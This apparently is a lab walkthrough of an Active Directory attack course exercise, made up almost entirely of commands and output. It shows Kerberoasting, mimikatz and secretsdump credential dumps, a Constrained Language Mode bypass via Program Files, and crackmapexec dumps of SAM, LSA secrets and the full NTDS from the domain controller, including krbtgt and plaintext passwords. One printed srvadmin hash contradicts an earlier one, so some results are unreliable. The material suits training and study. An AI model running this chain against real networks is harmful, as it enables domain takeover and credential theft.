# Learning Objective - 7

## Process using svcadmin as service account

<figure><img src="/files/GM84hMcmDCYDkY3Qpqm2" alt=""><figcaption></figcaption></figure>

```
PS C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2


[*] SamAccountName         : websvc
[*] DistinguishedName      : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet             : 11/14/2022 4:42:13 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast


[*] SamAccountName         : svcadmin
[*] DistinguishedName      : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet             : 11/14/2022 9:06:37 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\AD\Tools\hashes.kerberoast

[*] Roasted hashes written to : C:\AD\Tools\hashes.kerberoast
```

```
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: hashes.kerberoast
Time.Started.....: Thu Feb 22 04:26:58 2024, (1 min, 6 secs)
Time.Estimated...: Thu Feb 22 04:28:04 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Mod........: Rules (clem9669_small.rule.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   164.3 MH/s (4.97ms) @ Accel:8 Loops:128 Thr:32 Vec:1
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 11045180300/11045180300 (100.00%)
Rejected.........: 0/11045180300 (0.00%)
Restore.Point....: 14344390/14344390 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:384-385 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: !!sexyangel!! -> retr02301
Hardware.Mon.#1..: Temp: 62c Fan: 32% Util: 40% Core:2025MHz Mem:10251MHz Bus:16

Started: Thu Feb 22 04:26:57 2024
Stopped: Thu Feb 22 04:28:05 2024
```

Neither hash cracked: hashcat exhausted rockyou.txt with the rule set and recovered 0/2.

But...

<figure><img src="/files/6Z1HaGviTZKfYsO1qVYD" alt=""><figcaption></figcaption></figure>

So, since we already hold the ciadmin credentials, we try them against dcorp-mgmt (172.16.4.44):

```
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 -x whoami
SMB         172.16.4.44     445    DCORP-MGMT       [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.4.44     445    DCORP-MGMT       [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB         172.16.4.44     445    DCORP-MGMT       [+] Executed command 
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\ciadmin

```

<figure><img src="/files/paFXrQZvmDjCuY7oM8TT" alt=""><figcaption></figcaption></figure>

Answer:

```
sqlservr.exe
```

## NTLM hash of svcadmin account

<pre><code><strong>[dcorp-mgmt]: PS C:\> .\SafetyKatz.exe "sekurlsa::logonPasswords full" "exit"
</strong>
  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::logonPasswords full

Authentication Id : 0 ; 132376 (00000000:00020518)
Session           : Service from 0
User Name         : svcadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:31:39 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1118
        msv :
         [00000003] Primary
         * Username : svcadmin
         * Domain   : dcorp
         * NTLM     : b38ff50264b74508085d82c69794a4d8
         * SHA1     : a4ad2cd4082079861214297e1cae954c906501b9
         * DPAPI    : f26ae0cc48396dccd8caa24cd33127e7
        tspkg :
        wdigest :
         * Username : svcadmin
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : svcadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : *ThisisBlasphemyThisisMadness!!
        ssp :
        credman :
</code></pre>

Answer:

```
b38ff50264b74508085d82c69794a4d8
```

## NTLM hash of srvadmin extracted from dcorp-adminsrv

```
impacket-secretsdump -hashes ':b38ff50264b74508085d82c69794a4d8' 'svcadmin@172.16.4.101'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0aa524e1204e0a68be320cc136ed76b9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c0bba089d2d62e4d8911fc2fcc0c2e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
DOLLARCORP.MONEYCORP.LOCAL/srvadmin:$DCC2$10240#srvadmin#904d497b20b7f6aa8667a17d6405289d
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
dcorp\DCORP-ADMINSRV$:aes256-cts-hmac-sha1-96:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51
dcorp\DCORP-ADMINSRV$:aes128-cts-hmac-sha1-96:83bfc18bd7f63a5921bf0ce2eb87755f
dcorp\DCORP-ADMINSRV$:des-cbc-md5:384552e53d8acdea
dcorp\DCORP-ADMINSRV$:plain_password_hex:51003a00680046005400270021004600550058005000360045005f003200290043004b002000640078006d00320076006c002a0027004e003e0061003b007a002d004e0049004d006f006700650069004200740048004d0074006a006700770040002c004c0078003a00590044002e003d002200350047005b0065002000200059002b0077004e0040005e00340034003e00490054004000730064005e0044007800510034004800570052005900360025003200300038003f006c005400450062005500600075002e0048003000640025007a005900490057002f006400400051006100540037005a00740064002700
dcorp\DCORP-ADMINSRV$:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb769847ee855152df7a4594c40a86f4e4212d031
dpapi_userkey:0x15ed629ec20c5b5e266129832d792b0bc84b1010
[*] NL$KM 
 0000   09 C8 7B C2 96 41 6E CB  B2 F6 1B DC 29 5C 39 76   ..{..An.....)\9v
 0010   7E A6 22 97 DC D3 BE 6B  C3 71 48 71 61 6B B2 B3   ~."....k.qHqak..
 0020   D0 D6 E0 48 F0 8B 7D 8B  8B 14 95 05 B4 21 FE 93   ...H..}......!..
 0030   28 51 47 F1 26 24 B5 F4  E4 20 B6 AC E5 90 33 02   (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] _SC_SNMPTRAP 
dcorp\websvc:AServicewhichIsNotM3@nttoBe
[*] _SC_wmiApSrv 
dcorp\appadmin:*ActuallyTheWebServer1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

```

Checking the LanguageMode. The interactive session is in ConstrainedLanguage, but a script dropped under C:\Program Files runs in FullLanguage. That is the usual AppLocker behaviour: when CLM is enforced through AppLocker in Allow mode, a script in a path the rules allow (the default script rule allows everything under Program Files) runs with full language while the prompt stays constrained, so that is where we place Invoke-Mimikatz.ps1.

{% code overflow="wrap" %}

```
[dcorp-adminsrv]: PS C:\Program Files> echo '$ExecutionContext.SessionState.LanguageMode' > test.ps1
[dcorp-adminsrv]: PS C:\Program Files> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
[dcorp-adminsrv]: PS C:\Program Files> .\test.ps1
FullLanguage
```

{% endcode %}

We append one line to the end of Invoke-Mimikatz.ps1 so the function is invoked when the script itself runs (in FullLanguage, as checked above):

```
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "Sekurlsa::LogonPasswords"'
```

Then we run the script and answer the flags.

{% code overflow="wrap" %}

```
 PS C:\Program Files> .\Invoke-Mimikatz.ps1

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

616     {0;000003e7} 1 D 16097          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;00e70446} 0 D 15141446    dcorp\svcadmin  S-1-5-21-719815819-3726368948-3917688648-1118   (11g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 18044422    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # Sekurlsa::LogonPasswords

Authentication Id : 0 ; 752154 (00000000:000b7a1a)
Session           : RemoteInteractive from 2
User Name         : srvadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:45:15 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1115
        msv :
         [00000003] Primary
         * Username : srvadmin
         * Domain   : dcorp
         * NTLM     : a98e18228819e8eec3dfa33cb68b0728
         * SHA1     : f613d1bede9a620ba16ae786e242d3027809c82a
         * DPAPI    : a593cded7a622d70818fb3315264a140
        tspkg :
        wdigest :
         * Username : srvadmin
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : srvadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 144880 (00000000:000235f0)
Session           : Service from 0
User Name         : websvc
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:31:06 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1114
        msv :
         [00000003] Primary
         * Username : websvc
         * Domain   : dcorp
         * NTLM     : cc098f204c5887eaa8253e7c2749156f
         * SHA1     : 36f2455c767ac9945fdc7cd276479a6a011e154b
         * DPAPI    : afa3166d71b438639f1c77118153d316
        tspkg :
        wdigest :
         * Username : websvc
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : websvc
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : AServicewhichIsNotM3@nttoBe
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DCORP-ADMINSRV$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : dcorp-adminsrv$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 539692 (00000000:00083c2c)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:41:47 PM
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : DCORP-ADMINSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e  Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
        ssp :
        credman :

Authentication Id : 0 ; 144881 (00000000:000235f1)
Session           : Service from 0
User Name         : appadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:31:06 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117
        msv :
         [00000003] Primary
         * Username : appadmin
         * Domain   : dcorp
         * NTLM     : d549831a955fee51a43c83efb3928fa7
         * SHA1     : 07de541a289d45a577f68c512c304dfcbf9e4816
         * DPAPI    : a5d49d98574a7574ab70fa77797c367d
        tspkg :
        wdigest :
         * Username : appadmin
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : *ActuallyTheWebServer1
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 21178 (00000000:000052ba)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : DCORP-ADMINSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e  Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
        ssp :
        credman :

Authentication Id : 0 ; 21140 (00000000:00005294)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:50 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : DCORP-ADMINSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Q:hFT'!FUXP6E_2)CK dxm2vl*'N>a;z-NIMogeiBtHMtjgw@,Lx:YD.="5G[e  Y+wN@^44>IT@sd^DxQ4HWRY6%208?lTEbU`u.H0d%zYIW/d@QaT7Ztd'
        ssp :
        credman :

Authentication Id : 0 ; 20080 (00000000:00004e70)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:49 PM
SID               :
        msv :
         [00000003] Primary
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * NTLM     : b5f451985fd34d58d5120816d31b5565
         * SHA1     : f83c66f77706d11664e98e159166687298ab1a2c
         * DPAPI    : f83c66f77706d11664e98e1591666872
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DCORP-ADMINSRV$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:49 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : DCORP-ADMINSRV$
         * Domain   : dcorp
         * Password : (null)
        kerberos :
         * Username : dcorp-adminsrv$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
        ssp :
        credman :
```

{% endcode %}

```
crackmapexec smb 172.16.4.44 -u ciadmin -p *ContinuousIntrusion123 --lsa
SMB         172.16.4.44     445    DCORP-MGMT       [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.4.44     445    DCORP-MGMT       [+] dollarcorp.moneycorp.local\ciadmin:*ContinuousIntrusion123 (Pwn3d!)
SMB         172.16.4.44     445    DCORP-MGMT       [+] Dumping LSA secrets
SMB         172.16.4.44     445    DCORP-MGMT       DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB         172.16.4.44     445    DCORP-MGMT       DOLLARCORP.MONEYCORP.LOCAL/mgmtadmin:$DCC2$10240#mgmtadmin#b51b86694af5c690d2ad019fbfc00707
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:aes256-cts-hmac-sha1-96:b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:aes128-cts-hmac-sha1-96:0049f234ae46eba0bfb2ced5b8c8d2b4
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:des-cbc-md5:a79234f220c4549e
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:plain_password_hex:34003f0050006800430068004b005000280060003f00790057006000450038003d0056004d00320051004900310033004f00210069002a00330051003f005700560042002200580029003d003e0049006c0033003d00410063007a004a0030005e005400210058005d00720026003a002600790047003400310060002a002f0024005e0034002b00450065005a00300037003f007a00460032005a00330060003a005b004a0064002a0046002f007a005f00500060007000360042003900580048005e00670024002a006d005800490051004d00580059002800530063003f0033005c00410036004900430072005800
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\DCORP-MGMT$:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB         172.16.4.44     445    DCORP-MGMT       dpapi_machinekey:0xb3084493f6af9cf8b2964ee53accccd428737b2c
dpapi_userkey:0xe46d070e975b2473e749e7927a64a61fe1575b20
SMB         172.16.4.44     445    DCORP-MGMT       NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.4.44     445    DCORP-MGMT       dcorp\svcadmin:*ThisisBlasphemyThisisMadness!!
SMB         172.16.4.44     445    DCORP-MGMT       [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.secrets and /home/dsds/.cme/logs/DCORP-MGMT_172.16.4.44_2024-02-22_044511.cached

```

We test the new credentials.

```
crackmapexec smb 172.16.4.44 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB         172.16.4.44     445    DCORP-MGMT       [*] Windows 10.0 Build 20348 x64 (name:DCORP-MGMT) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.4.44     445    DCORP-MGMT       [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
```

We resolve the domain name to get the DC's IP.

```
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> nslookup.exe dollarcorp.moneycorp.local
Server:  UnKnown
Address:  172.16.2.1

Name:    dollarcorp.moneycorp.local
Address:  172.16.2.1

```

We test the credentials against the DC.

```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!'
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
```

And we dump everything: SAM, LSA secrets and finally NTDS.

```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --sam
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping SAM hashes
SMB         172.16.2.1      445    DCORP-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:a102ad5753f4c441e3af31c97fad86fd:::
SMB         172.16.2.1      445    DCORP-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.2.1      445    DCORP-DC         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB         172.16.2.1      445    DCORP-DC         [+] Added 3 SAM hashes to the database

```

```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --lsa
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping LSA secrets
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:aes256-cts-hmac-sha1-96:f4583f2be42c52751be1ce4e8f51c3c256c89be2b41e0b6c57c8f2cd4edadfcf
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:aes128-cts-hmac-sha1-96:10715e504e5e3b6825f0a58aabd03108
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:des-cbc-md5:bc321ad310ce1ab5
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:plain_password_hex:9d2b4437a83b9f4b7038e6fdb58f506b95726a3034a92bac398a7dd61856d91ce33067a9d945f051ed1b1de95feffd32eef8481b25306953859d7242259108676568b30259b28570e0fe906928f4fcf1ae5698ae526b7c17b02a43e90b7fc2902351adc7f1bd3e8e03c0050123b1db24af4397449ebd8ea44347e68071d76a9a78b1f315229f3a2915397621d8cb968518d4937dd8ea46a988276c15a85bf0f7db00800120c318d73cdff23562b8e5d96af5754c507a760e9ba73c4ce67cb74b349f340fdd8dc9e0bac7ebd390afa440c23c8e0059de3f472359c205f7ddea65ae0efd662a35d7dc0335968eeb642886
SMB         172.16.2.1      445    DCORP-DC         dcorp\DCORP-DC$:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB         172.16.2.1      445    DCORP-DC         dpapi_machinekey:0x558f948af84f9dec3acf3499b5e9af0de2d8e803
dpapi_userkey:0xb1b020a793cbecd7d3ad7aacbc6b73f33c9e4d43
SMB         172.16.2.1      445    DCORP-DC         NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB         172.16.2.1      445    DCORP-DC         [+] Dumped 7 LSA secrets to /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.secrets and /home/dsds/.cme/logs/DCORP-DC_172.16.2.1_2024-02-22_050159.cached

```

```
crackmapexec smb 172.16.2.1 -u svcadmin -p '*ThisisBlasphemyThisisMadness!!' --ntds
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\svcadmin:*ThisisBlasphemyThisisMadness!! (Pwn3d!)
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.2.1      445    DCORP-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB         172.16.2.1      445    DCORP-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.2.1      445    DCORP-DC         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB         172.16.2.1      445    DCORP-DC         sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB         172.16.2.1      445    DCORP-DC         websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB         172.16.2.1      445    DCORP-DC         srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB         172.16.2.1      445    DCORP-DC         appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB         172.16.2.1      445    DCORP-DC         svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB         172.16.2.1      445    DCORP-DC         testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB         172.16.2.1      445    DCORP-DC         mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::
SMB         172.16.2.1      445    DCORP-DC         ciadmin\ciadmin:1121:aad3b435b51404eeaad3b435b51404ee:e08253add90dccf1a208523d02998c3d:::
SMB         172.16.2.1      445    DCORP-DC         sql1admin\sql1admin:1122:aad3b435b51404eeaad3b435b51404ee:e999ae4bd06932620a1e78d2112138c6:::
SMB         172.16.2.1      445    DCORP-DC         dollarcorp.moneycorp.local\studentadmin:4181:aad3b435b51404eeaad3b435b51404ee:d1254f303421d3cdbdc4c73a5bce0201:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-DC$:1000:aad3b435b51404eeaad3b435b51404ee:ef7a661f7edb7f5a1be191640342d6b7:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-ADMINSRV$:1105:aad3b435b51404eeaad3b435b51404ee:b5f451985fd34d58d5120816d31b5565:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-APPSRV$:1106:aad3b435b51404eeaad3b435b51404ee:b4cb7bf8b93c78b8051c7906bb054dc5:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-CI$:1107:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-MGMT$:1108:aad3b435b51404eeaad3b435b51404ee:0878da540f45b31b974f73312c18e754:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-MSSQL$:1109:aad3b435b51404eeaad3b435b51404ee:b205f1ca05bedace801893d6aa5aca27:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-SQL1$:1110:aad3b435b51404eeaad3b435b51404ee:3686dfb420dc0f9635e70c6ca5875b49:::
SMB         172.16.2.1      445    DCORP-DC         DCORP-STDADMIN$:4202:aad3b435b51404eeaad3b435b51404ee:e444bbf444732fc38065ea9e9255ab03:::
